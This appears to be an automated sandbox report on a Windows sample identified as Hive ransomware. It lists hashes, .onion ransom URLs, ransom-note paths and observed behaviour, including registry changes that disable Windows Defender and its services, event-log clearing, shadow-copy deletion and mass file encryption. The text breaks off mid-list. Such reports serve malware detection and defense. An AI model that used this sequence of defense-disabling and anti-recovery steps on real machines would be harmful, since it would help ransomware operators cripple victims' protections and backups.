Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 15:59
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
-
Size
3.3MB
-
MD5
6c1444d0e1c63881918fdd4d60d54f9d
-
SHA1
408db71f315ae43204f1a34b6f28c5ac51d5507b
-
SHA256
d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33
-
SHA512
bacf08c9d9c93495f01356589249dba5d5b8588acb7f00eb7d92e784875ef9610e37687ff32233c49f862f5564c6cf1fe0643ea8179a3e1be98eec65485525c1
-
SSDEEP
49152:uVcQjH6VIOIgQFF3KzfKeSQSqFvVqp/kHzQJqEFH1D1R:uVpjK7xWF34fSQSqFvVqpcfE
Malware Config
Extracted
C:\Program Files\Common Files\DESIGNER\wFLb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4764 wevtutil.exe 3872 wevtutil.exe 2184 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 4608 powershell.exe 4388 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-32_altform-unplated.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_swpGx3QD7iw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-48.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-200_contrast-black.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-white_scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Toolkit\Images\dash.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-200.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsStoreLogo.scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-400.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxWideTile.scale-200.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reject_18.svg.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_z28gR2GXalw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\osmmui.msi.16.en-us.vreg.dat.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz__Zi5gmNZV900.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\no_camera_dialog_image01.jpg JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer10Sec.targetsize-16.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover.png.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_m_9VmEBXcC80.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageLargeTile.scale-150_contrast-black.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailWideTile.scale-200.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz__lDC9d5bTbA0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-100_contrast-white.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MusicStoreLogo.scale-200_contrast-white.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\PREVIEW.GIF.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_Ix9SbEqlPKQ0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_ywNpUTT9Evw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_3c694phvAn40.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteReplayCrossHairIcon-1.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-GoogleCloudCacheMini.scale-150.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\PREVIEW.GIF.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_ygZDo1J1bnk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\zlib.md.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_-2eUahoBXa40.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\osmuxmui.msi.16.en-us.tree.dat.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_xZH2TEnWVmE0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_70.png.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_FYjEiH4kWMw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-24_altform-unplated_contrast-white.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-100_contrast-black.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-pl.xrm-ms.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_eISxL-F25NM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-200.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Speech\en-GB\tokens_enGB.xml JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-24_altform-lightunplated.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_contrast-black.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\RangeSelector.xbf JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\LargeTile.scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_it.properties.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_XO_J3LyUFhk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Google.scale-250.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Wide310x150Logo.scale-150.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-200.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2019.807.41.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info2x.png.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_IQDOxwDoW6s0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosSmallTile.scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\sr-cyrl-cs\mso.acl JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker1.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-24_altform-unplated.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-pl.xrm-ms.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_2UhUzIzylNs0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GameBar_AppList.scale-100.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\ui-strings.js.tnYrAEupD6Ukno9nL_kWhkzX1SxJKm2Ki-kdNPH7iiz_i-HHQoY_kQ40.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1408 sc.exe 3768 sc.exe 4976 sc.exe 4940 sc.exe 3920 sc.exe 3108 sc.exe 4700 sc.exe 4236 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1188 cmd.exe 2620 PING.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1784 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2620 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4608 powershell.exe 4608 powershell.exe 4388 powershell.exe 4388 powershell.exe 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 4764 wevtutil.exe Token: SeBackupPrivilege 4764 wevtutil.exe Token: SeSecurityPrivilege 3872 wevtutil.exe Token: SeBackupPrivilege 3872 wevtutil.exe Token: SeSecurityPrivilege 2184 wevtutil.exe Token: SeBackupPrivilege 2184 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4552 wmic.exe Token: SeSecurityPrivilege 4552 wmic.exe Token: SeTakeOwnershipPrivilege 4552 wmic.exe Token: SeLoadDriverPrivilege 4552 wmic.exe Token: SeSystemProfilePrivilege 4552 wmic.exe Token: SeSystemtimePrivilege 4552 wmic.exe Token: SeProfSingleProcessPrivilege 4552 wmic.exe Token: SeIncBasePriorityPrivilege 4552 wmic.exe Token: SeCreatePagefilePrivilege 4552 wmic.exe Token: SeBackupPrivilege 4552 wmic.exe Token: SeRestorePrivilege 4552 wmic.exe Token: SeShutdownPrivilege 4552 wmic.exe Token: SeDebugPrivilege 4552 wmic.exe Token: SeSystemEnvironmentPrivilege 4552 wmic.exe Token: SeRemoteShutdownPrivilege 4552 wmic.exe Token: SeUndockPrivilege 4552 wmic.exe Token: SeManageVolumePrivilege 4552 wmic.exe Token: 33 4552 wmic.exe Token: 34 4552 wmic.exe Token: 35 4552 wmic.exe Token: 36 4552 wmic.exe Token: SeIncreaseQuotaPrivilege 4476 wmic.exe Token: SeSecurityPrivilege 4476 wmic.exe Token: SeTakeOwnershipPrivilege 4476 wmic.exe Token: SeLoadDriverPrivilege 4476 wmic.exe Token: SeSystemProfilePrivilege 4476 wmic.exe Token: SeSystemtimePrivilege 4476 wmic.exe Token: SeProfSingleProcessPrivilege 4476 wmic.exe Token: SeIncBasePriorityPrivilege 4476 wmic.exe Token: SeCreatePagefilePrivilege 4476 wmic.exe Token: SeBackupPrivilege 4476 